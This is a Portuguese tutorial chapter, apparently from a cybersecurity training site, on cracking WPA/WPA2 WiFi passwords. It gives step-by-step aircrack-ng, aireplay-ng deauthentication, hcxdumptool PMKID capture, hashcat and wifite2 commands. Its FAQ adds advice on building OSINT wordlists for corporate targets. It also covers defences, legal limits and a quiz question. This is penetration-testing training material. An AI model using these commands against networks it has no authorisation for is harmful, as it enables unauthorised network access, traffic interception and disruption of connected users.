Ataques de senhas de redes sem fio

Capturando e quebrando segurança WPA/WPA2

Segurança WiFi Captura de handshake Penetração de rede

O que você vai descobrir

🎯 Por que isso importa

A avaliação de segurança de redes sem fio representa um componente crítico dos testes de penetração modernos. Organizações implantam redes WiFi em todas as suas instalações, frequentemente sem entender completamente as implicações de segurança. A criptografia WPA2 e WPA3 fornece proteção criptográfica forte, mas senhas fracas permanecem a vulnerabilidade fundamental que permite acesso não autorizado à rede. Profissionais de segurança precisam de habilidades de quebra de senhas sem fio para avaliar a postura de segurança real de implantações WiFi, identificar autenticação fraca e demonstrar a viabilidade de ataques antes que atores maliciosos explorem essas fraquezas para obter acesso à rede, interceptar tráfego ou pivotar para sistemas internos.

🔍 O que você vai aprender

Você dominará ferramentas profissionais de quebra de senhas sem fio incluindo aircrack-ng, hashcat, hcxdumptool e wifite2, entenderá a captura e quebra do handshake 4-way WPA/WPA2, aprenderá técnicas modernas de ataque PMKID que contornam requisitos de autenticação de cliente, e desenvolverá habilidades em reconhecimento sem fio, captura de pacotes e recuperação de senhas. Essas técnicas são essenciais para testes de penetração sem fio, avaliações de segurança de implantações WiFi corporativas e compreensão da superfície de ataque que redes sem fio apresentam tanto para ameaças internas quanto externas.

🚀 Sua primeira vitória

Nos próximos 20 minutos, você entenderá como a captura de handshake WPA2 funciona, aprenderá a extrair hashes de autenticação de redes sem fio e saberá exatamente como profissionais de segurança quebram senhas WiFi durante testes de penetração.

🔧 Experimente agora

Vamos explorar o reconhecimento de rede sem fio para entender o fluxo de trabalho de ataque (requer adaptador WiFi com suporte a modo monitor):

# Instalar a suíte aircrack-ng (contém ferramentas sem fio)
# Ubuntu/Debian
sudo apt update && sudo apt install aircrack-ng

# Kali Linux (pré-instalado)
# Já inclui aircrack-ng, airmon-ng, airodump-ng

# macOS requer adaptador WiFi específico - o integrado não funciona
# Recomendado: Alfa AWUS036ACH ou adaptador similar compatível com modo monitor

# Verificar sua interface sem fio
iwconfig
# Procurar: wlan0, wlp2s0, ou similar

# Ativar modo monitor no seu adaptador sem fio
sudo airmon-ng start wlan0
# Isso cria a interface mon0 ou wlan0mon

# Escanear redes sem fio próximas
sudo airodump-ng wlan0mon

# Você verá:
# - BSSID (endereço MAC do AP)
# - PWR (força do sinal)
# - Beacons (anúncios do AP)
# - CH (canal)
# - ENC (tipo de criptografia: WPA, WPA2, WPA3)
# - ESSID (nome da rede)

# Parar modo monitor quando terminar
sudo airmon-ng stop wlan0mon

# NOTA: Realize estas técnicas apenas em redes que você possui
# ou tem permissão escrita explícita para testar.
# Acesso não autorizado a redes sem fio viola leis de fraude computacional.

Você verá: Todas as redes sem fio ao alcance com suas configurações de segurança. Esta fase de reconhecimento identifica redes WPA2 (o alvo principal), força do sinal (proximidade) e número de clientes conectados (para captura de handshake). Entender este fluxo de trabalho prepara você para avaliações de segurança sem fio profissionais.

Habilidades que você dominará

✅ Compreensão fundamental

  • Processo de autenticação handshake 4-way WPA/WPA2
  • Metodologia de extração e ataque PMKID
  • Captura e análise de pacotes sem fio
  • Protocolos de criptografia WiFi e vulnerabilidades

🔍 Habilidades avançadas

  • Técnicas avançadas de ataque de desautenticação
  • Quebra de senhas sem fio acelerada por GPU
  • Avaliação WPA/WPA2-Enterprise
  • Penetração sem fio automatizada com wifite2

Entendendo a segurança sem fio

WPA2 (Wi-Fi Protected Access 2) implementa proteção criptográfica robusta usando criptografia AES-CCMP e derivação de chave segura através do handshake 4-way. Quando um cliente se conecta a uma rede WPA2, o ponto de acesso e o cliente realizam uma troca de autenticação mútua que gera chaves de sessão únicas derivadas da chave pré-compartilhada (PSK) - a senha WiFi. Esta troca de handshake contém material criptográfico que permite ataques de quebra de senha offline. Profissionais de segurança capturam esses handshakes e usam ferramentas especializadas para testar a força da senha sem requerer acesso contínuo à rede.

🔐 Handshake 4-way WPA2

AP → Cliente: ANonce (número aleatório do AP)
Cliente → AP: SNonce + MIC (prova que o cliente conhece a senha)
AP → Cliente: GTK + MIC (chave temporal de grupo)
Cliente → AP: ACK (handshake completo, chaves de sessão derivadas)

A fraqueza

O handshake 4-way contém material criptográfico suficiente para verificar tentativas de senha offline, permitindo testes de senha ilimitados sem interação ou detecção de rede.

O ataque

Capturar pacotes de handshake durante a autenticação do cliente, extrair hashes criptográficos, então aplicar ataques de dicionário ou força bruta offline para recuperar a senha PSK.

O resultado

Acesso completo à rede com capacidade de interceptar tráfego, pivotar para sistemas internos e manter acesso não autorizado persistente à rede sem fio.

A especificação do protocolo de segurança WPA2 descreve o processo de autenticação em detalhes, mas a vulnerabilidade fundamental permanece a força da senha. A implementação criptográfica é sólida - AES-256 fornece criptografia robusta e PBKDF2 com 4.096 iterações cria a chave mestra de pares (PMK). Porém, senhas fracas permitem quebra bem-sucedida independentemente da força da criptografia. Uma senha de 8 caracteres usando letras minúsculas e números pode ser quebrada em horas, enquanto uma senha de 12+ caracteres com alta entropia resiste às capacidades de quebra atuais.

Ataques PMKID modernos representam uma evolução na metodologia de quebra de senhas sem fio. Descoberto em 2018 por Jens Steube (criador do hashcat), o ataque PMKID explora uma falha de design no elemento de informação de rede de segurança robusta WPA2 (RSN IE). O ponto de acesso inclui o PMKID no primeiro frame do handshake 4-way, calculado como HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). Este único frame contém informação suficiente para realizar ataques de senha offline sem requerer um handshake completo ou presença de cliente. Ferramentas como hcxdumptool podem extrair PMKIDs diretamente dos pontos de acesso, simplificando dramaticamente o fluxo de trabalho de ataque e eliminando a necessidade de ataques de desautenticação de clientes.

Ferramentas e técnicas

🔨 Suíte aircrack-ng: captura tradicional de handshake

A suíte aircrack-ng representa o padrão da indústria para avaliação de segurança sem fio, fornecendo ferramentas abrangentes para habilitação de modo monitor, captura de pacotes, análise de handshake e quebra de senhas. Esta suíte inclui airmon-ng (modo monitor), airodump-ng (captura de pacotes), aireplay-ng (desautenticação) e aircrack-ng (quebra de senhas).

# Ativar modo monitor
sudo airmon-ng start wlan0
# Cria interface wlan0mon

# Escanear rede alvo
sudo airodump-ng wlan0mon

# Capturar handshake em canal específico
# Substituir: BSSID por MAC do AP, CH por canal, ESSID por nome da rede
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Em outro terminal: Forçar deauth do cliente para capturar handshake
# Isso força o cliente a reconectar e transmitir o handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Observar saída do airodump-ng para: "WPA handshake: AA:BB:CC:DD:EE:FF"
# Isso confirma captura bem-sucedida

# Quebrar o handshake capturado
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

# Resultado mostra senha se encontrada na wordlist
# Exemplo de saída: "KEY FOUND! [ password123 ]"

A abordagem aircrack-ng requer capturar um handshake 4-way completo, o que necessita presença de cliente e atividade de conexão. O ataque de desautenticação desconecta forçadamente os clientes, causando reconexão e transmissão do handshake. Embora eficaz, esta abordagem gera disrupção de rede perceptível e pode acionar monitoramento de segurança. O arquivo .cap capturado contém os frames EAPOL com dados de autenticação, que o aircrack-ng usa para verificar tentativas de senha computando o PMK e comparando valores derivados.

⚡ hcxdumptool + hashcat: ataques PMKID modernos

A suíte hcxdumptool e hcxtools permite ataques sem fio modernos baseados em PMKID que eliminam a necessidade de presença de cliente ou desautenticação. Combinada com a aceleração GPU do hashcat, esta abordagem representa o estado da arte atual em quebra de senhas sem fio.

# Instalar hcxdumptool e hcxtools
# Ubuntu/Debian
sudo apt install hcxdumptool hcxtools

# Kali Linux
sudo apt install hcxdumptool hcxtools

# Ativar modo monitor (se não já ativado)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Capturar PMKIDs de APs próximos (nenhum cliente necessário!)
sudo hcxdumptool -i wlan0 -o capture.pcapng --enable_status=1

# Executar por 5-10 minutos para capturar PMKIDs de múltiplos APs
# Status mostra: PMKIDs capturados, handshakes capturados, APs detectados

# Converter captura para formato hashcat
hcxpcapngtool -o hashes.hc22000 capture.pcapng

# Examinar hashes capturados
cat hashes.hc22000
# Formato: WPA*02*PMKID*MAC_AP*MAC_CLIENT*ESSID

# Quebrar com hashcat (modo 22000 para WPA-PMKID-PBKDF2)
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt

# Quebra acelerada por GPU
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -w 3

# Ataque baseado em regras para mutações de senha
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -r rules/best64.rule

# Ataque por máscara para padrões conhecidos
hashcat -m 22000 -a 3 hashes.hc22000 '?u?l?l?l?l?l?l?d?d'

O ataque PMKID funciona porque pontos de acesso incluem este valor no RSN IE do primeiro frame EAPOL. A divulgação original do ataque PMKID pelo hashcat demonstrou que este único frame fornece tudo necessário para ataques de senha offline. Diferente da captura de handshake tradicional, ataques PMKID não requerem desautenticação de cliente, tornando-os mais furtivos e confiáveis. Porém, nem todos os pontos de acesso são vulneráveis - alguns fabricantes implementaram mitigações que previnem extração de PMKID.

🚀 wifite2: ataques sem fio automatizados

Wifite2 fornece auditoria de rede sem fio totalmente automatizada, combinando reconhecimento, captura de handshake, extração PMKID e quebra de senhas em um fluxo de trabalho simplificado. Esta ferramenta é ideal para avaliação rápida de múltiplas redes sem fio.

# Instalar wifite2
# Ubuntu/Debian
sudo apt install wifite

# Kali Linux (pré-instalado)
wifite --help

# Executar ataque automatizado (gerencia tudo automaticamente)
sudo wifite

# Wifite vai:
# 1. Ativar modo monitor automaticamente
# 2. Escanear redes sem fio
# 3. Permitir selecionar alvo(s)
# 4. Tentar captura PMKID primeiro (rápido, furtivo)
# 5. Recorrer à captura de handshake se necessário
# 6. Quebrar senhas automaticamente

# Alvejar rede específica por ESSID
sudo wifite --essid "TargetNetwork"

# Alvejar redes por tipo de criptografia
sudo wifite --wpa

# Usar wordlist personalizada
sudo wifite --dict /path/to/wordlist.txt

# Pular quebra, apenas capturar handshakes
sudo wifite --no-crack

# Atacar WPS (se habilitado no AP)
sudo wifite --wps

# Saída verbosa para debugging
sudo wifite --verbose

Wifite2 gerencia a complexidade de ataques sem fio automaticamente, tornando-o acessível para avaliadores de segurança que precisam de resultados rápidos. A ferramenta integra com aircrack-ng, reaver (ataques WPS), bully e outros utilitários para fornecer cobertura de ataque abrangente. Ela detecta automaticamente o melhor método de ataque para cada alvo e gerencia recuperação de erros. Embora conveniente, entender as técnicas subjacentes permanece importante para troubleshooting e cenários avançados.

🎯 Técnicas avançadas e otimização

Avaliações sem fio profissionais requerem entendimento de técnicas de captura avançadas, otimização de ataques e métodos de troubleshooting para cenários desafiadores.

# Verificar qualidade do handshake antes de quebrar
# Handshakes incompletos desperdiçam tempo de quebra
aircrack-ng -w test.txt capture-01.cap
# Deve mostrar: "1 handshake" não "0 handshakes"

# Converter .cap para formato hashcat
hcxpcapngtool -o handshake.hc22000 capture-01.cap

# Limpar e otimizar arquivos de captura
# Remover frames duplicados e tráfego não-WPA
wpaclean cleaned.cap dirty.cap

# Desautenticação direcionada (cliente específico)
aireplay-ng --deauth 5 -a AP_MAC -c CLIENT_MAC wlan0mon

# Monitoramento contínuo para múltiplos handshakes
# Útil em ambientes movimentados com muitos clientes
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w multi-capture wlan0mon

# Otimização hashcat para quebra sem fio
# Usar --force se receber erros OpenCL
hashcat -m 22000 hashes.hc22000 rockyou.txt --force

# Status durante quebra (pressionar 's')
# Mostra velocidade, progresso, tempo estimado

# Ataques de combinação para WiFi corporativo
# Combinar nome da empresa com padrões comuns
hashcat -m 22000 -a 1 hashes.hc22000 company.txt patterns.txt

# Troubleshooting: Verificar se handshake é válido
tshark -r capture-01.cap -Y eapol
# Deve mostrar 4 frames EAPOL (ou mínimo 2)

Verificação de qualidade do handshake previne tempo desperdiçado em capturas inválidas. Um handshake 4-way completo contém quatro frames EAPOL, mas apenas frames 2 e 3 (ou às vezes 1 e 2) são necessários para quebra de senha. Converter capturas para formato hashcat permite aceleração GPU, fornecendo melhorias de velocidade de 100-1000x sobre aircrack-ng baseado em CPU. Para redes sem fio corporativas, wordlists personalizadas incorporando termos específicos da empresa aumentam dramaticamente as taxas de sucesso.

Contramedidas defensivas

🛡️ Políticas de senhas WiFi fortes

A segurança de redes sem fio depende fundamentalmente da força da senha. Organizações devem implementar e impor políticas de senhas WiFi robustas que contabilizem capacidades de quebra offline. O framework de cibersegurança NIST recomenda requisitos específicos de senha para redes sem fio que assumem que atacantes capturarão handshakes e tentarão quebra offline.

  • Senhas de mínimo 20 caracteres: Frases de passe longas resistem efetivamente a ataques de força bruta
  • Requisitos de alta entropia: Misturar maiúsculas, minúsculas, números, símbolos - evitar palavras de dicionário
  • Rotação regular de senhas: Mudar senhas WiFi trimestralmente ou após saídas de funcionários
  • Senhas únicas por SSID: Senhas diferentes para redes de convidados, funcionários e gerenciamento

🔐 Migração WPA3 e autenticação enterprise

WPA3 corrige vulnerabilidades fundamentais no handshake 4-way do WPA2 através da autenticação simultânea de iguais (SAE), que fornece sigilo futuro e resistência a ataques de dicionário offline. Para ambientes corporativos, WPA2/WPA3-Enterprise com autenticação 802.1X elimina vulnerabilidades PSK inteiramente.

  • Implantação WPA3: Atualizar para pontos de acesso compatíveis com WPA3 e impor modo apenas WPA3
  • Modo de transição WPA2/WPA3: Suportar ambos durante período de migração, então desabilitar WPA2
  • Autenticação 802.1X/RADIUS: Credenciais de usuário individuais em vez de senhas compartilhadas
  • Autenticação baseada em certificados: EAP-TLS com certificados de cliente para maior segurança

⚡ Detecção e prevenção de intrusão sem fio

Infraestrutura sem fio corporativa deve incluir sistemas de detecção de intrusão sem fio (WIDS) e sistemas de prevenção de intrusão sem fio (WIPS) que detectam e respondem a atividade de ataque incluindo tentativas de captura de handshake, ataques de desautenticação e pontos de acesso não autorizados.

  • Detecção de ataque de desautenticação: Monitorar frames deauth excessivos e bloquear dispositivos atacantes
  • Detecção de AP não autorizado: Identificar pontos de acesso não autorizados usando SSIDs da empresa
  • Isolamento de clientes: Prevenir clientes de comunicar diretamente (impede movimento lateral)
  • Proteção de frames de gerenciamento (802.11w): Proteger criptograficamente frames de desautenticação

🔍 Segmentação e monitoramento de rede

Redes sem fio devem ser tratadas como não confiáveis e segregadas de recursos internos críticos através de segmentação de rede, VLANs e políticas de firewall que assumem comprometimento do sem fio.

  • Segmentação VLAN: Separar redes sem fio da infraestrutura cabeada
  • Políticas de firewall: Restringir acesso de rede sem fio apenas à internet, bloquear recursos internos
  • Isolamento de rede de convidados: Separação completa com limitação de banda e filtragem de conteúdo
  • Monitoramento e logging: Logging abrangente de tentativas de autenticação e acesso à rede

FAQ

Básico de quebra de senhas sem fio

Como quebrar uma senha WiFi WPA2?

Para quebrar senhas WiFi WPA2, capture o handshake 4-way usando ferramentas como airodump-ng enquanto um cliente autentica na rede (use desautenticação aireplay-ng para forçar reconexão), ou use hcxdumptool para extrair PMKIDs que não requerem presença de cliente. Converta os dados capturados para formato hashcat com hcxpcapngtool, então quebre com hashcat usando ataques de dicionário, mutações baseadas em regras ou ataques de máscara. Aceleração GPU melhora dramaticamente a velocidade de quebra. O sucesso depende inteiramente da força da senha - senhas fracas quebram em minutos, senhas fortes de 20+ caracteres resistem à quebra indefinidamente.

Qual a diferença entre capturar handshakes e ataques PMKID?

Captura tradicional de handshake requer esperar um cliente autenticar (ou forçar reconexão via desautenticação), então capturar a troca EAPOL 4-way completa entre cliente e ponto de acesso. Ataques PMKID, descobertos em 2018, extraem o valor PMKID diretamente do primeiro frame EAPOL do ponto de acesso sem requerer presença de cliente ou desautenticação. Ataques PMKID são mais rápidos, mais furtivos e mais confiáveis, mas nem todos os pontos de acesso são vulneráveis - alguns fabricantes corrigiram isso. Use hcxdumptool para ataques PMKID e a suíte aircrack-ng para captura tradicional de handshake.

Qual adaptador WiFi funciona melhor para quebra de senhas sem fio?

Quebra de senhas sem fio requer adaptadores WiFi que suportam modo monitor e injeção de pacotes. O Alfa AWUS036ACH (dual-band AC1200) é amplamente recomendado para redes modernas suportando 2,4GHz e 5GHz com excelente suporte a modo monitor. Alfa AWUS036NHA funciona bem para redes apenas 2,4GHz. TP-Link TL-WN722N v1 (não v2/v3) é econômico para 2,4GHz. A maioria das placas WiFi integradas de laptops não suporta modo monitor ou injeção de pacotes. Verifique as listas de compatibilidade de adaptadores sem fio antes de comprar.

Implementação técnica

Quanto tempo leva para quebrar diferentes tipos de senhas WiFi?

O tempo de quebra varia enormemente baseado na força da senha e hardware. Senhas de 8 caracteres usando palavras de dicionário quebram em segundos a minutos. Senhas de 8-10 caracteres com tipos de caracteres mistos podem levar horas a dias dependendo da complexidade. Senhas de 12-15 caracteres com alta entropia levam semanas a meses mesmo com GPUs poderosas. Senhas aleatórias de 20+ caracteres são efetivamente inquebráveis com tecnologia atual. WPA2 usa PBKDF2 com 4.096 iterações que desacelera a quebra comparado a outros tipos de hash. GPUs de ponta alcançam 300.000-1.000.000 senhas/segundo para WPA2, enquanto CPUs gerenciam apenas 1.000-10.000/segundo.

Quais são os dados mínimos de handshake necessários para quebra de senha?

Você precisa no mínimo dos frames EAPOL 2 e 3 (ou às vezes 1 e 2) do handshake 4-way para quebrar com sucesso senhas WPA2. O frame 2 contém o SNonce do cliente e o MIC (Message Integrity Check) provando que o cliente conhece a senha. O frame 3 contém a confirmação do AP. Esses dois frames fornecem material criptográfico suficiente para verificar tentativas de senha offline. O handshake 4-way completo contém quatro frames EAPOL, mas nem todos são necessários para quebra. Verifique a completude do handshake com aircrack-ng ou tshark antes de tentar quebrar.

Aplicações práticas

Por que ataques de desautenticação às vezes falham em capturar handshakes?

Ataques de desautenticação podem falhar por várias razões: dispositivos clientes não reconectam imediatamente (dispositivos móveis frequentemente esperam), proteção de frames de gerenciamento (802.11w) bloqueia frames deauth, o cliente já estava conectado (envie deauth para MAC de cliente específico), força do sinal está muito fraca (aproxime-se do AP), ou você está no canal errado. Use desautenticação direcionada contra MACs de cliente específicos em vez de deauth broadcast. Garanta que seu adaptador suporta injeção de pacotes (teste com aireplay-ng --test). Tente ataques PMKID com hcxdumptool como alternativa que não requer desautenticação ou presença de cliente.

Posso quebrar senhas WPA3 da mesma forma que WPA2?

Não, WPA3 usa autenticação simultânea de iguais (SAE) em vez do handshake 4-way, que fornece sigilo futuro e resistência a ataques de dicionário offline. O handshake SAE não expõe dados de verificação de senha em pacotes capturados, tornando métodos tradicionais de quebra WPA2 ineficazes. WPA3 é vulnerável a ataques de canal lateral e falhas de implementação (como vulnerabilidades Dragonblood descobertas em 2019), mas estes requerem técnicas de ataque diferentes da quebra de senhas WPA2. Organizações ainda devem usar senhas fortes com WPA3 como defesa em profundidade, mas o design criptográfico do WPA3 melhora significativamente a resistência a ataques de quebra de senha.

Quais padrões de senha funcionam melhor para quebra de WiFi corporativo?

Redes WiFi corporativas frequentemente usam padrões de senha previsíveis: nome da empresa + ano, departamento + "WiFi" + ano, nomes de projetos + trimestres, ou identificadores de prédio/andar. Crie wordlists personalizadas a partir de coleta OSINT - site da empresa, perfis LinkedIn, comunicados à imprensa, nomes de produtos, localizações de escritórios. Padrões comuns incluem CompanyName2024, OfficeWiFi2024!, DeptSecure2024, Building1Guest. Use regras hashcat para gerar mutações (capitalização, l33t speak, adição de ano, sufixos de caracteres especiais). Ataques de combinação juntando termos da empresa com senhas comuns são altamente eficazes. Alvo redes de convidados primeiro pois tipicamente têm senhas mais fracas que redes de funcionários.

Quebra de senhas sem fio é legal?

Quebra de senhas sem fio é legal apenas em redes que você possui ou tem permissão escrita explícita para testar. Acesso não autorizado a redes sem fio viola o Computer Fraud and Abuse Act (CFAA) nos EUA e leis similares globalmente. Mesmo capturar handshakes sem autorização pode constituir interceptação ilegal. Pentesters profissionais obtêm autorização escrita detalhada (regras de engajamento) antes de avaliações de segurança sem fio. Testar em sua própria rede doméstica é legal. Usar WiFi sem permissão, mesmo se não criptografado, é ilegal na maioria das jurisdições. Sempre obtenha autorização apropriada, mantenha documentação e permaneça dentro do escopo definido de testes.

🎯 Você domina a quebra de senhas sem fio!

Você agora entende mecanismos de autenticação WPA/WPA2, pode capturar handshakes 4-way e PMKIDs, e sabe como quebrar senhas sem fio usando ferramentas profissionais como aircrack-ng, hashcat e hcxdumptool. Essas habilidades são essenciais para testes de penetração sem fio, avaliações de segurança de implantações WiFi corporativas e compreensão da superfície de ataque que redes sem fio apresentam tanto para ameaças internas quanto externas.

Segurança sem fio Captura de handshake Ataques PMKID Pentesting de rede

Pronto para explorar técnicas de recuperação de senhas de sistema Windows

Validação de Conhecimento

Demonstre sua compreensão para ganhar pontos e progredir

1
Pergunta do Capítulo

Qual é o número do modo hashcat usado para quebrar hashes WPA2-PMKID e WPA2-EAPOL? (Formato de exemplo: 12345)

1
Ler
2
Validar
3
Concluir

Pronto para acompanhar seu progresso?

Crie uma conta gratuita para salvar seu progresso, ganhar pontos e acessar mais de 170 labs práticos de cibersegurança.

Comece a Aprender Grátis
Junte-se a 5.000+ hackers aprendendo cibersegurança com labs práticos. Criar Conta